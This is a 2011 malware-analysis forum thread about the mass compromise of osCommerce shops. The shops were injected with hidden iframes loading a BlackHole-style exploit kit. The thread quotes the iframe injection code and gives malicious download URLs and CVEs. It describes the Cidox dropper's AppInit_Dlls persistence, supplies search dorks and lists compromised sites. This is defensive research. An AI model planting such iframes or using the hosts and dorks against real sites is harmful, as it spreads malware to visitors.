A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #7698  by EP_X0FF
 Wed Jul 27, 2011 9:27 am
http://blog.armorize.com/2011/07/willys ... going.html

Simple googing for "http://willysy.com/images/banners" shows about 100000+ pages with the following iframe.
Code: Select all
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
The decoded payload scripts looks like updated/modified version of BlackHole, see bellow
http://pastebin.com/jAPCwSz8.

CVE-2010-0840 - Java Trust
CVE-2010-0188 – PDF LibTiff
CVE-2010-0886 - Java SMB
CVE-2006-0003 - IE MDAC
CVE-2010-1885 – HCP
 #7700  by Xylitol
 Wed Jul 27, 2011 9:38 am
panel screenshot:
Image

Image

Image

Seem they use malwox.biz affil
Code: Select all
hxxp://malwox.biz/files/user_38.exe
hxxp://malwox.biz/files/user_48.exe
hxxp://malwox.biz/files/user_45.exe
user_38.exe:
http://www.virustotal.com/file-scan/rep ... 1311759620
user_48.exe:
http://www.virustotal.com/file-scan/rep ... 1311759618
user_45.exe:
http://www.virustotal.com/file-scan/rep ... 1311759615

'setup.jpg' found by armorize:
http://www.virustotal.com/file-scan/rep ... 1311761716

Image
Attachments
pwd: xylibox
(32.59 KiB) Downloaded 53 times
pwd: xylibox
(230.13 KiB) Downloaded 56 times
 #7734  by EP_X0FF
 Thu Jul 28, 2011 4:53 pm
user_38 is Cidox aka Mayachok.1
Payload dll set in AppInit_Dlls, as (in my case) C:\WINDOWS\system32\yxobjxi.dll
Dropper writes all required information and reboots computer with ExitWindowsEx call to make injection work. I didn't looked on other samples, but looking on VT they are the same.
It is named Mayachok because of internal name of injected dll - IntMayak.dll
 #7739  by nickvth2009
 Thu Jul 28, 2011 9:11 pm
Hmm.. this makes me think about Gumblar.

The reason for all of this is probably an 0-day found on July 10th, 2011 for the open-source software "osCommerce." Appearentely, you can edit the site info without being logged in. This means you can add JavaScript. The exploit, which is nothing more than a clue, can be found here: http://www.1337day.com/exploits/16505.

I put the URL leading to the exploit here because the site is known to blackhats, and webserver admins can make better security stages and create workarounds.

Something you can try is making the URL:
Code: Select all
/admin/configuration.php
not accessible from the outside.

For example, hxxp://www.bikes4less.nl/catalog/ (visiting is your own risk!) shows that the website got cracked earlier with, probably, the same exploit:
Code: Select all
<title>Hacked By Tn Mahdi Sad Hacker<iframe src='http://willysy.com/images/banners/'
 style='position:absolute;visibility:hidden'></iframe></title>
By the way, the rest of the webpage is not really good anymore, lol.

Anyway, here's a talk about it. The Dutch version, the original, was also posted to the security.nl boards on Tuesday.
http://blog.armorize.com/2011/07/willys ... on-ongoing reports a flood of compromised website that upload malware. (source: http://threatpost.com/en_us/blogs/massi ... ges-072611)

Visiting such compromised website with a PC which doesn't have the latest security updates installed (webbrowser, operating system, Java, Adobe Leaker, Adobe Flash, Quicktime and plug-ins)is enough to have your computer get classified "compromised."

Searching with the dork "src=http://exero.eu" site:.nl was enough to find the amount of Dutch websites (somethings only certain pages of the following) that were compromised. Google only warns for some of the following websites though: (this is from Tuesday)

hxxp://123clonephones.nl/
hxxp://innologic.nl/
hxxp://onderdelenvolvo.nl/
hxxp://sanik.nl/webshop/
hxxp://www.2ehands-online.nl/
hxxp://www.accuwijzer.nl/catalog/
hxxp://www.ballookado.nl/catalog/
hxxp://www.berkenpeis.nl/winkel/
hxxp://www.blingsundaysbest.nl/webshop/
hxxp://www.bottegabijoux.nl/shop/information_2.php
hxxp://www.depaardenshop.nl/shop/index.php?cPath=29_33
hxxp://www.dilomatoro.nl/
hxxp://www.dogsupplyservice.nl/english_kitchen ... =1&sort=2d
hxxp://www.duraroos.nl/catalog/
hxxp://www.dutchfone.nl/
hxxp://www.eshopsplaza.nl/wakkerdier/
hxxp://www.glazen-deur.nl/
hxxp://www.height-safety.nl/store/catalog/
hxxp://www.hippestippe.nl/shop/products_new.php?page=13
hxxp://www.keijlsmagic.nl/winkel/
hxxp://www.koffiebonenonline.nl/
hxxp://www.marinestore.nl/
hxxp://www.mirjamsknutselplezier.nl/products_new.php
hxxp://www.nikahorseproducts.nl/catalog/
hxxp://www.nordicnew.nl/onlineshop/
hxxp://www.paintballclub.nl/shop/catalog/
hxxp://www.rpgamershop.nl/shop/
hxxp://www.shoes-n-things.nl/
hxxp://www.tagdepartment.nl/store/
hxxp://www.umutelectronica.nl/
hxxp://www.yottawatts.nl/

A part of the above websites allow you to pay with a credit card...

The following websites/pages were, according to Google, compromised, but are likely to be fixed right now:

hxxp://www.bodyflower.nl/winkel/
hxxp://www.europacker.nl/shop/
hxxp://www.morgenisnu.nl/shop/eldiolie495ml-p-397.html

You can recognize infected pages by looking at their source. You will see something like the following:
Code: Select all
<title>Innologic</title><iframe src='http://exero.eu/catalog/css.htm' style='position:absolute;visibility:hidden'></iframe><title></title>
Searching with the dork "http://willysy.com/images/banners/" site:.nl will give you results with partly the same websites.
 #7741  by Gunnerofarsenal
 Fri Jul 29, 2011 1:58 am
EP_X0FF wrote:user_38 is Cidox aka Mayachok.1
Payload dll set in AppInit_Dlls, as (in my case) C:\WINDOWS\system32\yxobjxi.dll
Dropper writes all required information and reboots computer with ExitWindowsEx call to make injection work. I didn't looked on other samples, but looking on VT they are the same.
It is named Mayachok because of internal name of injected dll - IntMayak.dll
Thanks I just looked at it myself also, took me awhile to get to the unpacked code :o . According to symantec, Cidox modifies the boot sector's Initial Program Loader. Did I miss something?

http://www.symantec.com/security_respon ... 99&tabid=2
 #7742  by EP_X0FF
 Fri Jul 29, 2011 2:50 am
Gunnerofarsenal wrote:
EP_X0FF wrote:user_38 is Cidox aka Mayachok.1
Payload dll set in AppInit_Dlls, as (in my case) C:\WINDOWS\system32\yxobjxi.dll
Dropper writes all required information and reboots computer with ExitWindowsEx call to make injection work. I didn't looked on other samples, but looking on VT they are the same.
It is named Mayachok because of internal name of injected dll - IntMayak.dll
Thanks I just looked at it myself also, took me awhile to get to the unpacked code :o . According to symantec, Cidox modifies the boot sector's Initial Program Loader. Did I miss something?

http://www.symantec.com/security_respon ... 99&tabid=2
It is different version.
 #7774  by Gunnerofarsenal
 Fri Jul 29, 2011 7:36 pm
EP_X0FF wrote:
Gunnerofarsenal wrote:
EP_X0FF wrote:user_38 is Cidox aka Mayachok.1
Payload dll set in AppInit_Dlls, as (in my case) C:\WINDOWS\system32\yxobjxi.dll
Dropper writes all required information and reboots computer with ExitWindowsEx call to make injection work. I didn't looked on other samples, but looking on VT they are the same.
It is named Mayachok because of internal name of injected dll - IntMayak.dll
Thanks I just looked at it myself also, took me awhile to get to the unpacked code :o . According to symantec, Cidox modifies the boot sector's Initial Program Loader. Did I miss something?

http://www.symantec.com/security_respon ... 99&tabid=2
It is different version.
Thanks, I was wondering why i didnt see that when reversing, that was the smooth part, can anyone advise me on getting around the C&C?